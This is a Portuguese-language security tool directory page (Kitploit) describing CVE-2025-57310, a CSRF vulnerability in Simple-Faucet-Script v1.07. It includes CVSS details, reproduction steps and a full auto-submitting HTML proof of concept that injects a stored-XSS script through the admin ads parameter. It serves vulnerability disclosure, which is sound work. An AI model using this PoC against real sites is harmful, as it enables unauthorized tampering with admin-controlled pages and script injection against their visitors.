Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-57310 — Uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no Salmen2/Simple-Faucet-Script v1.07 através de uma requisição POST manipulada para admin.php?p=ads&c=1 permitindo que atacantes executem código arbitrário. | Kitploit
Ferramentas/GitHubGitHub/mmakingdom/cve-2025-57310
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubmmakingdom/cve-2025-57310

CVE-2025-57310

Uma vulnerabilidade de Cross-Site Request Forgery (CSRF) no Salmen2/Simple-Faucet-Script v1.07 através de uma requisição POST manipulada para admin.php?p=ads&c=1 permitindo que atacantes executem código arbitrário.

Ver Repositório
1há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-57310

Uma vulnerabilidade de Cross-Site Request Forgery (CSRF) em Salmen2/Simple-Faucet-Script v1.07 através de uma requisição POST manipulada para admin.php?p=ads&c=1 permitindo que atacantes executem código arbitrário.

CWE

CWE-352: Cross-Site Request Forgery (CSRF)

Pontuação Base CVSS v3.1: 8.8 (Alto)

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Resumo

O produto é vulnerável a Cross-Site Request Forgery (CSRF) no painel de administração. Quando um administrador autenticado visita uma página maliciosa contendo o PoC, o ataque CSRF causa modificação não autorizada do conteúdo da página inicial.

Passos para reproduzir

  1. Faça login como administrador em https://example.com/admin.php
  2. Abra o seguinte PoC e observe um popup de alerta na página inicial (XSS Armazenado).
root@kitploit:~
<!DOCTYPE html>
  <html>
  <head>
      <title>CSRF PoC</title>
  </head>
  <body>
      <h3>Standard CSRF PoC</h3>
      <form action="https://example.com/admin.php?p=ads&c=1" method="post">
        <input type="hidden" name="spacetop" value="<script>alert();</script>" />
          <input type="submit" value="Submit request" />
      </form>
      <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
      </script>
  </body>
  </html>

Impacto

Um atacante pode injetar HTML/JavaScript arbitrário na página inicial através do parâmetro spacetop, levando a Cross-Site Scripting Armazenado (XSS).

Créditos

Muntadhar M. Ahmed (almuntadhar0x01)

Baixar ferramenta